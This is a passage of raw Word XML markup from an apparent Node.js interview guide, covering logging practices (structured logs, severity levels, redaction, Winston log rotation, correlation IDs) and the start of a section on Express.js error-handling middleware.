    <w:p w14:paraId="31C594DC"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logger.error('This is an error message');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EC7F23"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2. Structure Your Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D61292"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Structured logging involves logging information in a consistent, machine-readable format (e.g., JSON). This allows logs to be easily parsed, searched, and analyzed by logging systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09932F01"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example of Structured Logging:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2244E0DD" w14:textId="77777777" w:rsidR="007828CF" w:rsidRPr="00DA2F32" w:rsidRDefault="007828CF"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logger.error('User login failed', { userId: 123, ipAddress: '192.168.0.1' });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47734983"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3. Categorize Logs by Severity Levels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD80E84"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Categorizing logs by severity levels helps you filter and analyze logs based on the importance of the messages. Common log levels include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B1B551" w14:textId="77777777" w:rsidR="007828CF" w:rsidRPr="00DA2F32" w:rsidRDefault="007828CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="587"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Error:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Critical issues that need immediate attention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7785DCAF" w14:textId="77777777" w:rsidR="007828CF" w:rsidRPr="00DA2F32" w:rsidRDefault="007828CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="587"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Warn:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Potential issues or important events that require monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657013F1" w14:textId="77777777" w:rsidR="007828CF" w:rsidRPr="00DA2F32" w:rsidRDefault="007828CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="587"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Info:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> General operational information about the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B9F3D2" w14:textId="77777777" w:rsidR="007828CF" w:rsidRPr="00DA2F32" w:rsidRDefault="007828CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="587"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Debug:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Detailed information useful for debugging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CB8F03" w14:textId="77777777" w:rsidR="007828CF" w:rsidRPr="00DA2F32" w:rsidRDefault="007828CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="587"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Verbose/Silly:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Highly detailed logs, usually for deep debugging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433A4A1F"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4. Log Errors in a Global Error Handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3A4D8C"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Centralizing error logging in a global error handler ensures that all uncaught exceptions and unhandled rejections are logged.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBDB5E0"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example in Express.js:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3953779E" w14:textId="77777777" w:rsidR="007828CF" w:rsidRPr="00DA2F32" w:rsidRDefault="007828C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5220BB7E" w14:textId="77777777" w:rsidR="007828CF" w:rsidRPr="00DA2F32" w:rsidRDefault="007828C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logger.error('Unhandled error', { message: err.message, stack: err.stack });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC5BB79" w14:textId="77777777" w:rsidR="007828CF" w:rsidRPr="00DA2F32" w:rsidRDefault="007828C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res.status(500).json({ error: 'Internal Server Error' });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B5DD9C" w14:textId="77777777" w:rsidR="007828CF" w:rsidRPr="00DA2F32" w:rsidRDefault="007828CF"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54037C8B"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5. Implement Distributed Logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CDB64A"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 xml:space="preserve">In a microservices or distributed system, it’s important to collect logs from multiple services in a centralized location. Tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ELK Stack (Elasticsearch, Logstash, Kibana)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Graylog</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">, or cloud-based solutions like </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AWS CloudWatch</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Azure Monitor</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Google Cloud Logging</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be used to aggregate and analyze logs across services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D70DE7"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6. Monitor and Alert on Critical Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3D024E"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 xml:space="preserve">Integrate your logging system with monitoring and alerting tools to receive notifications for critical issues. For instance, you can set up alerts for error level logs or specific patterns in logs using tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Prometheus</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Grafana</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>New Relic</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328E2455"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7. Secure Your Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1214B1FD"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Ensure that sensitive information (e.g., passwords, personal data) is not logged. Use redaction techniques or filter out sensitive data before logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFCF9F9"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example of Redacting Sensitive Data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D551B6" w14:textId="77777777" w:rsidR="007828CF" w:rsidRPr="00DA2F32" w:rsidRDefault="007828C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sensitiveFields = ['password', 'creditCard'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AC7B45" w14:textId="77777777" w:rsidR="007828CF" w:rsidRPr="00DA2F32" w:rsidRDefault="007828CF"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logger.info('User data', { ...user, password: '[REDACTED]' });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F020333"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8. Rotate and Archive Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B417C30"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To prevent log files from consuming too much disk space, implement log rotation and archiving. Many logging libraries support this natively or through plugins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A463447"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example Using Winston Daily Rotate File:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782A3A3C"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require('winston-daily-rotate-file');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070914E0"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const transport = new winston.transports.DailyRotateFile({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02727945"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filename: 'application-%DATE%.log',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA2FFC3"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datePattern: 'YYYY-MM-DD',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143AE8C9"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maxSize: '20m',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330124B0"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maxFiles: '14d'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE93A38"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076B5EB9"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3D1D93A8"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logger.add(transport);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B67391"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9. Handle Uncaught Exceptions and Unhandled Rejections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7C4BDB"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Ensure that uncaught exceptions and unhandled promise rejections are logged before the application exits or restarts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6776E3A7"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13DD4D59"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process.on('uncaughtException', (err) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BECFEEA"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logger.error('Uncaught Exception', { message: err.message, stack: err.stack });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFC1799"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process.exit(1); // Optional: Restart the process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B221217"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351CB71A"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9A92382"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process.on('unhandledRejection', (reason, promise) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C3FB81"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logger.error('Unhandled Rejection', { reason });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7194766D" w14:textId="77777777" w:rsidR="007828CF" w:rsidRPr="00DA2F32" w:rsidRDefault="007828CF"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67902962" w14:textId="77777777" w:rsidR="007828CF" w:rsidRPr="00DA2F32" w:rsidRDefault="007828CF" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>10. Log Correlation IDs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2090831F"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In distributed systems, include a correlation ID in your logs to trace requests across different services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63031307" w14:textId="77777777" w:rsidR="007828CF" w:rsidRPr="00DA2F32" w:rsidRDefault="007828CF" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example of Adding a Correlation ID:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B621CC" w14:textId="77777777" w:rsidR="007828CF" w:rsidRPr="00DA2F32" w:rsidRDefault="007828CF" w:rsidP="009E0607">
      <w:pP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lastRenderedPageBreak/>
        <w:t>const correlationId = uuid.v4(); // Generate a unique ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643B51CB" w14:textId="77777777" w:rsidR="007828CF" w:rsidRPr="00DA2F32" w:rsidRDefault="007828CF" w:rsidP="009E0607">
      <w:pP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logger.info('Processing request', { correlationId });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257CF85D" w14:textId="77777777" w:rsidR="00EB2BF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00EB2BF7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36A185B9" w14:textId="4E6B686A" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="173" w:name="_Toc178383355"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>How do you handle errors in Express.js middleware?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="173"/>
    </w:p>
    <w:p w14:paraId="21753FA9"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Handling errors in Express.js middleware is an essential practice for maintaining the robustness and reliability of an application. Express.js provides a simple and effective way to handle errors through error-handling middleware. Here’s how to manage errors in Express.js middleware:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A17ED9E" w14:textId="77777777" w:rsidR="00612561" w:rsidRPr="00DA2F32" w:rsidRDefault="00612561" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1. Basic Error Handling in Middleware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73039B37"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>When you create custom middleware, you can handle errors by passing them to the next middleware function using the next() function. If an error is passed to next(), Express skips all remaining non-error-handling middleware and passes control to the error-handling middleware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C667E7F"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0C13978A"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app.use((req, res, next) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A950FD"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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0894DB2C"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Your middleware logic here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A8D19E"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If an error occurs, throw it or pass it to next()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547E81CC"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throw new Error('Something went wrong!');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1446626D"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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3AB7FA"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next(err); // Pass the error to the next middleware (error-handling middleware)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B0DD7E"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0A2E055E"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2908B6A" w14:textId="77777777" w:rsidR="00612561" w:rsidRPr="00DA2F32" w:rsidRDefault="00612561" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2. Creating an Error-Handling Middleware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E41380D"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Error-handling middleware is a special type of middleware in Express that takes four arguments: err, req, res, and next. This middleware is used to catch and handle errors throughout the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47101CB2"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5E718D1F"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453FC284"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console.error(err.stack); // Log the error stack trace for debugging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A161D24"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res.status(500).json({ message: 'Internal Server Error' }); // Send a user-friendly error message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D68CA16"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81DB04B" w14:textId="77777777" w:rsidR="00612561" w:rsidRPr="00DA2F32" w:rsidRDefault="00612561" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3. Using next() for Error Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6601024A"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In your regular middleware, you can pass an error to the error-handling middleware by calling next(err). Express will automatically skip the remaining middlewares and route handlers, and invoke the error-handling middleware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC1B0F1"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268F1A0B"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app.use((req, res, next) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE6F25C"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error = new Error('Resource not found');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EC8F82"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error.status = 404;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564A5122"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next(error); // Pass the error to the error-handling middleware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C175632"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652BBFE" w14:textId="77777777" w:rsidR="00612561" w:rsidRPr="00DA2F32" w:rsidRDefault="00612561" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4. Handling Errors in Asynchronous Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F02D49E"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>When using asynchronous code (e.g., promises, async/await) inside middleware, make sure to catch errors and pass them to next().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA386F8"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example with Promises:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236FC03C"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app.use((req, res, next) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112E9278"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someAsyncOperation()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B5C2CF"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.then(result =&gt; res.send(result))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FF6866"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.catch(next); // Pass the error to the error-handling middleware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E54EBCB"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2AE6A350"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example with async/await:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D44F15"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app.use(async (req, res, next) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEAB9E2"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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEA0A77"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result = await someAsyncOperation();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA03858"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res.send(result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609E5BE3"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 catch (err) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3637FE17"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next(err); // Pass the error to the error-handling middleware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1B7E0B"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42BF1CA0"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8B9FB8B" w14:textId="77777777" w:rsidR="00612561" w:rsidRPr="00DA2F32" w:rsidRDefault="00612561" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5. Catch-All Error Handler</w:t>
      </w:r>
    </w:p>
